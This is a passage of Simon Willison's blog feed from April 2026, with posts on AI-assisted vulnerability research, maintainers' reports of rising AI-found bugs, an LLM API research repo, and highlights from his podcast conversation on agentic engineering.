    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="vibe-coding"/><category term="ai-assisted-programming"/><category term="sqlite"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="ai"/><category term="llms"/></entry><entry><title>Quoting Chengpeng Mou</title><link href="https://simonwillison.net/2026/Apr/5/chengpeng-mou/#atom-tag" rel="alternate"/><published>2026-04-05T21:47:06+00:00</published><updated>2026-04-05T21:47:06+00:00</updated><id>https://simonwillison.net/2026/Apr/5/chengpeng-mou/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/cpmou2022/status/2040606209800290404"&gt;&lt;p&gt;From anonymized U.S. ChatGPT data, we are seeing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;~2M weekly messages on health insurance&lt;/li&gt;
&lt;li&gt;~600K weekly messages [classified as healthcare] from people living in “hospital deserts” (30 min drive to nearest hospital)&lt;/li&gt;
&lt;li&gt;7 out of 10 msgs happen outside clinic hours&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/cpmou2022/status/2040606209800290404"&gt;Chengpeng Mou&lt;/a&gt;, Head of Business Finance, OpenAI&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-ethics"/><category term="generative-ai"/><category term="openai"/><category term="chatgpt"/><category term="ai"/><category term="llms"/></entry><entry><title>research-llm-apis 2026-04-04</title><link href="https://simonwillison.net/2026/Apr/5/research-llm-apis/#atom-tag" rel="alternate"/><published>2026-04-05T00:32:11+00:00</published><updated>2026-04-05T00:32:11+00:00</updated><id>https://simonwillison.net/2026/Apr/5/research-llm-apis/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;strong&gt;Release:&lt;/strong&gt; &lt;a href="https://github.com/simonw/research-llm-apis/releases/tag/2026-04-04"&gt;research-llm-apis 2026-04-04&lt;/a&gt;&lt;/p&gt;
    &lt;p&gt;I'm working on a &lt;a href="https://github.com/simonw/llm/issues/1314"&gt;major change&lt;/a&gt; to my LLM Python library and CLI tool. LLM provides an abstraction layer over hundreds of different LLMs from dozens of different vendors thanks to its plugin system, and some of those vendors have grown new features over the past year which LLM's abstraction layer can't handle, such as server-side tool execution.&lt;/p&gt;
&lt;p&gt;To help design that new abstraction layer I had Claude Code read through the Python client libraries for Anthropic, OpenAI, Gemini and Mistral and use those to help craft &lt;code&gt;curl&lt;/code&gt; commands to access the raw JSON for both streaming and non-streaming modes across a range of different scenarios. Both the scripts and the captured outputs now live in this new repo.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="json"/><category term="llms"/><category term="llm"/></entry><entry><title>Vulnerability Research Is Cooked</title><link href="https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag" rel="alternate"/><published>2026-04-03T23:59:08+00:00</published><updated>2026-04-03T23:59:08+00:00</updated><id>https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can't design a better problem for an LLM agent than exploitation research.&lt;/p&gt;
&lt;p&gt;Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the &lt;code&gt;hrtimer&lt;/code&gt; subsystem, &lt;code&gt;workqueue&lt;/code&gt;, or &lt;code&gt;perf_event&lt;/code&gt;? The model knows.&lt;/p&gt;
&lt;p&gt;Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.&lt;/p&gt;
&lt;p&gt;Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The article was partly inspired by &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;this episode of the Security Cryptography Whatever podcast&lt;/a&gt;, where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.&lt;/p&gt;
&lt;p&gt;I just started a new tag here for &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; - it's up to 11 posts already.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/careers"&gt;careers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;&lt;/p&gt;



</summary><category term="thomas-ptacek"/><category term="careers"/><category term="security"/><category term="generative-ai"/><category term="ai-security-research"/><category term="ai"/><category term="llms"/><category term="nicholas-carlini"/><category term="ai-ethics"/></entry><entry><title>The cognitive impact of coding agents</title><link href="https://simonwillison.net/2026/Apr/3/cognitive-cost/#atom-tag" rel="alternate"/><published>2026-04-03T23:57:04+00:00</published><updated>2026-04-03T23:57:04+00:00</updated><id>https://simonwillison.net/2026/Apr/3/cognitive-cost/#atom-tag</id><summary type="html">
    &lt;p&gt;A fun thing about &lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/"&gt;recording a podcast&lt;/a&gt; with a professional like Lenny Rachitsky is that his team know how to slice the resulting video up into TikTok-sized short form vertical videos. Here's &lt;a href="https://x.com/lennysan/status/2039845666680176703"&gt;one he shared on Twitter today&lt;/a&gt; which ended up attracting over 1.1m views!&lt;/p&gt;
&lt;p&gt;&lt;video
  src="https://static.simonwillison.net/static/2026/cognitive-cost.mp4"
  poster="https://static.simonwillison.net/static/2026/cognitive-cost-poster.jpg"
  controls
  preload="none"
  playsinline
  style="display:block; max-width:400px; width:100%; height:auto; margin:0 auto"
&gt;&lt;track src="https://static.simonwillison.net/static/2026/cognitive-cost.vtt" kind="captions" srclang="en" label="English"&gt;&lt;/video&gt;
&lt;/p&gt;
&lt;p&gt;That was 48 seconds. Our &lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/"&gt;full conversation&lt;/a&gt; lasted 1 hour 40 minutes.&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/podcast-appearances"&gt;podcast-appearances&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cognitive-debt"&gt;cognitive-debt&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-ethics"/><category term="coding-agents"/><category term="agentic-engineering"/><category term="generative-ai"/><category term="podcast-appearances"/><category term="ai"/><category term="llms"/><category term="cognitive-debt"/></entry><entry><title>Quoting Willy Tarreau</title><link href="https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag" rel="alternate"/><published>2026-04-03T21:48:22+00:00</published><updated>2026-04-03T21:48:22+00:00</updated><id>https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://lwn.net/Articles/1065620/"&gt;&lt;p&gt;On the kernel security list we've seen a huge bump of reports. We were between 2 and 3 per week maybe two years ago, then reached probably 10 a week over the last year with the only difference being only AI slop, and now since the beginning of the year we're around 5-10 per day depending on the days (fridays and tuesdays seem the worst). Now most of these reports are correct, to the point that we had to bring in more maintainers to help us.&lt;/p&gt;
&lt;p&gt;And we're now seeing on a daily basis something that never happened before: duplicate reports, or the same bug found by two different people using (possibly slightly) different tools.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://lwn.net/Articles/1065620/"&gt;Willy Tarreau&lt;/a&gt;, Lead Software Developer. HAPROXY&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Daniel Stenberg</title><link href="https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag" rel="alternate"/><published>2026-04-03T21:46:07+00:00</published><updated>2026-04-03T21:46:07+00:00</updated><id>https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://mastodon.social/@bagder/116336957584445742"&gt;&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt;, lead developer of cURL&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="daniel-stenberg"/><category term="security"/><category term="curl"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Greg Kroah-Hartman</title><link href="https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag" rel="alternate"/><published>2026-04-03T21:44:41+00:00</published><updated>2026-04-03T21:44:41+00:00</updated><id>https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt;, Linux kernel maintainer (&lt;a href="https://en.wikipedia.org/wiki/Greg_Kroah-Hartman"&gt;bio&lt;/a&gt;), in conversation with Steven J. Vaughan-Nichols&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Highlights from my conversation about agentic engineering on Lenny's Podcast</title><link href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#atom-tag" rel="alternate"/><published>2026-04-02T20:40:47+00:00</published><updated>2026-04-02T20:40:47+00:00</updated><id>https://simonwillison.net/2026/Apr/2/lennys-podcast/#atom-tag</id><summary type="html">
    &lt;p&gt;I was a guest on Lenny Rachitsky's podcast, in a new episode titled &lt;a href="https://www.lennysnewsletter.com/p/an-ai-state-of-the-union"&gt;An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines&lt;/a&gt;. It's available on &lt;a href="https://youtu.be/wc8FBhQtdsA"&gt;YouTube&lt;/a&gt;, &lt;a href="https://open.spotify.com/episode/0DVjwLT6wgtscdB78Qf1BQ"&gt;Spotify&lt;/a&gt;, and &lt;a href="https://podcasts.apple.com/us/podcast/an-ai-state-of-the-union-weve-passed-the/id1627920305?i=1000758850377"&gt;Apple Podcasts&lt;/a&gt;. Here are my highlights from our conversation, with relevant links.&lt;/p&gt;

&lt;iframe style="margin-top: 1.5em; margin-bottom: 1.5em;" width="560" height="315" src="https://www.youtube-nocookie.com/embed/wc8FBhQtdsA" title="Why we’ve passed the AI inflection point and automation has already started | Simon Willison" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"&gt; &lt;/iframe&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-november-inflection-point"&gt;The November inflection point&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#software-engineers-as-bellwethers-for-other-information-workers"&gt;Software engineers as bellwethers for other information workers&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#writing-code-on-my-phone"&gt;Writing code on my phone&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#responsible-vibe-coding"&gt;Responsible vibe coding&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#dark-factories-and-strongdm"&gt;Dark Factories and StrongDM&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-bottleneck-has-moved-to-testing"&gt;The bottleneck has moved to testing&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#this-stuff-is-exhausting"&gt;This stuff is exhausting&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#interruptions-cost-a-lot-less-now"&gt;Interruptions cost a lot less now&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#my-ability-to-estimate-software-is-broken"&gt;My ability to estimate software is broken&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#it-s-tough-for-people-in-the-middle"&gt;It's tough for people in the middle&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#it-s-harder-to-evaluate-software"&gt;It's harder to evaluate software&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-misconception-that-ai-tools-are-easy"&gt;The misconception that AI tools are easy&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#coding-agents-are-useful-for-security-research-now"&gt;Coding agents are useful for security research now&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#openclaw"&gt;OpenClaw&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#journalists-are-good-at-dealing-with-unreliable-sources"&gt;Journalists are good at dealing with unreliable sources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-pelican-benchmark"&gt;The pelican benchmark&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#and-finally-some-good-news-about-parrots"&gt;And finally, some good news about parrots&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#youtube-chapters"&gt;YouTube chapters&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id="the-november-inflection-point"&gt;The November inflection point&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=269"&gt;4:19&lt;/a&gt; - The end result of these two labs throwing everything they had at making their models better at code is that in November we had what I call the &lt;a href="https://simonwillison.net/tags/november-2025-inflection/"&gt;inflection point&lt;/a&gt; where GPT 5.1 and Claude Opus 4.5 came along.&lt;/p&gt;
&lt;p&gt;They were both incrementally better than the previous models, but in a way that crossed a threshold where previously the code would mostly work, but you had to pay very close attention to it. And suddenly we went from that to... almost all of the time it does what you told it to do, which makes all of the difference in the world.&lt;/p&gt;
&lt;p&gt;Now you can spin up a coding agent and say, &lt;a href="https://simonwillison.net/2026/Feb/25/present/"&gt;build me a Mac application that does this thing&lt;/a&gt;, and you'll get something back which won't just be a buggy pile of rubbish that doesn't do anything.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="software-engineers-as-bellwethers-for-other-information-workers"&gt;Software engineers as bellwethers for other information workers&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=349"&gt;5:49&lt;/a&gt; - I can churn out 10,000 lines of code in a day. And most of it works. Is that good? Like, how do we get from most of it works to all of it works? There are so many new questions that we're facing, which I think makes us a bellwether for other information workers.&lt;/p&gt;
&lt;p&gt;Code is easier than almost every other problem that you pose these agents because code is obviously right or wrong - either it works or it doesn't work. There might be a few subtle hidden bugs, but generally you can tell if the thing actually works.&lt;/p&gt;
&lt;p&gt;If it writes you an essay, if it prepares a lawsuit for you, it's so much harder to derive if it's actually done a good job, and to figure out if it got things right or wrong. But it's happening to us as software engineers. It came for us first.&lt;/p&gt;
&lt;p&gt;And we're figuring out, OK, what do our careers look like? How do we work as teams when part of what we did that used to take most of the time doesn't take most of the time anymore? What does that look like? And it's going to be very interesting seeing how this rolls out to other information work in the future.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Lawyers are falling for this really badly. The &lt;a href="https://www.damiencharlotin.com/hallucinations/"&gt;AI hallucination cases database&lt;/a&gt; is up to 1,228 cases now!&lt;/p&gt;
&lt;p&gt;Plus this bit from the cold open at &lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=0s"&gt;the start&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It used to be you'd ask ChatGPT for some code, and it would spit out some code, and you'd have to run it and test it. The coding agents take that step for you now. And an open question for me is how many other knowledge work fields are actually prone to these agent loops?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="writing-code-on-my-phone"&gt;Writing code on my phone&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=499"&gt;8:19&lt;/a&gt; - I write so much of my code on my phone. It's wild. I can get good work done walking the dog along the beach, which is delightful.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I mainly use the Claude iPhone app for this, both with a regular Claude chat session (which &lt;a href="https://simonwillison.net/2025/Sep/9/claude-code-interpreter/"&gt;can execute code now&lt;/a&gt;) or using it to control &lt;a href="https://code.claude.com/docs/en/claude-code-on-the-web"&gt;Claude Code for web&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="responsible-vibe-coding"&gt;Responsible vibe coding&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=595"&gt;9:55&lt;/a&gt; If you're vibe coding something for yourself, where the only person who gets hurt if it has bugs is you, go wild. That's completely fine. The moment you ship your vibe coding code for other people to use, where your bugs might actually harm somebody else, that's when you need to take a step back.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;See also &lt;a href="https://simonwillison.net/2025/Mar/19/vibe-coding/#when-is-it-ok-to-vibe-code-"&gt;When is it OK to vibe code?&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="dark-factories-and-strongdm"&gt;Dark Factories and StrongDM&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=769"&gt;12:49&lt;/a&gt; The reason it's called the dark factory is there's this idea in factory automation that if your factory is so automated that you don't need any people there, you can turn the lights off. Like the machines can operate in complete darkness if you don't need people on the factory floor. What does that look like for software? [...]&lt;/p&gt;
&lt;p&gt;So there's this policy that nobody writes any code: you cannot type code into a computer. And honestly, six months ago, I thought that was crazy. And today, probably 95% of the code that I produce, I didn't type myself. That world is practical already because the latest models are good enough that you can tell them to rename that variable and refactor and add this line there... and they'll just do it - it's faster than you typing on the keyboard yourself.&lt;/p&gt;
&lt;p&gt;The next rule though, is nobody &lt;em&gt;reads&lt;/em&gt; the code. And this is the thing which StrongDM started doing last year.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I wrote a lot more about &lt;a href="https://simonwillison.net/2026/Feb/7/software-factory/"&gt;StrongDM's dark factory explorations&lt;/a&gt; back in February.&lt;/p&gt;
&lt;h2 id="the-bottleneck-has-moved-to-testing"&gt;The bottleneck has moved to testing&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1287"&gt;21:27&lt;/a&gt; - It used to be, you'd come up with a spec and you hand it to your engineering team. And three weeks later, if you're lucky, they'd come back with an implementation. And now that maybe takes three hours, depending on how well the coding agents are established for that kind of thing. So now what, right? Now, where else are the bottlenecks?&lt;/p&gt;
&lt;p&gt;Anyone who's done any product work knows that your initial ideas are always wrong. What matters is proving them, and testing them.&lt;/p&gt;
&lt;p&gt;We can test things so much faster now because we can build workable prototypes so much quicker. So there's an interesting thing I've been doing in my own work where any feature that I want to design, I'll often prototype three different ways it could work because that takes very little time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've always loved prototyping things, and prototyping is even more valuable now.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1360"&gt;22:40&lt;/a&gt; - A UI prototype is free now. ChatGPT and Claude will just build you a very convincing UI for anything that you describe. And that's how you should be working. I think anyone who's doing product design and isn't vibe coding little prototypes is missing out on the most powerful boost that we get in that step.&lt;/p&gt;
&lt;p&gt;But then what do you do? Given your three options that you have instead of one option, how do you prove to yourself which one of those is the best? I don't have a confident answer to that. I expect this is where the good old fashioned usability testing comes in.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;More on prototyping later on:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2795"&gt;46:35&lt;/a&gt; - Throughout my entire career, my superpower has been prototyping. I've been very quick at knocking out working prototypes of things. I'm the person who can show up at a meeting and say, look, here's how it could work. And that was kind of my unique selling point. And that's gone. Anyone can do what I could do.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="this-stuff-is-exhausting"&gt;This stuff is exhausting&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1585"&gt;26:25&lt;/a&gt; - I'm finding that using coding agents well is taking every inch of my 25 years of experience as a software engineer, and it is mentally exhausting. I can fire up four agents in parallel and have them work on four different problems. And by like 11 AM, I am wiped out for the day. [...]&lt;/p&gt;
&lt;p&gt;There's a personal skill we have to learn in finding our new limits - what's a responsible way for us not to burn out.&lt;/p&gt;
&lt;p&gt;I've talked to a lot of people who are losing sleep because they're like, my coding agents could be doing work for me. I'm just going to stay up an extra half hour and set off a bunch of extra things... and then waking up at four in the morning. That's obviously unsustainable. [...]&lt;/p&gt;
&lt;p&gt;There's an element of sort of gambling and addiction to how we're using some of these tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="interruptions-cost-a-lot-less-now"&gt;Interruptions cost a lot less now&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2716"&gt;45:16&lt;/a&gt; - People talk about how important it is not to interrupt your coders. Your coders need to have solid two to four hour blocks of uninterrupted work so they can spin up their mental model and churn out the code. That's changed completely. My programming work, I need two minutes every now and then to prompt my agent about what to do next. And then I can do the other stuff and I can go back. I'm much more interruptible than I used to be.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="my-ability-to-estimate-software-is-broken"&gt;My ability to estimate software is broken&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1699"&gt;28:19&lt;/a&gt; - I've got 25 years of experience in how long it takes to build something. And that's all completely gone - it doesn't work anymore because I can look at a problem and say that this is going to take two weeks, so it's not worth it. And now it's like... maybe it's going to take 20 minutes because the reason it would have taken two weeks was all of the sort of crufty coding things that the AI is now covering for us.&lt;/p&gt;
&lt;p&gt;I constantly throw tasks at AI that I don't think it'll be able to do because every now and then it does it. And when it doesn't do it, you learn, right? But when it &lt;em&gt;does&lt;/em&gt; do something, especially something that the previous models couldn't do, that's actually cutting edge AI research.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And a related anecdote:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2216"&gt;36:56&lt;/a&gt; - A lot of my friends have been talking about how they have this backlog of side projects, right? For the last 10, 15 years, they've got projects they never quite finished. And some of them are like, well, I've done them all now. Last couple of months, I just went through and every evening I'm like, let's take that project and finish it. And they almost feel a sort of sense of loss at the end where they're like, well, okay, my backlog's gone. Now what am I going to build?&lt;/p&gt;
&lt;/blockquote&gt;
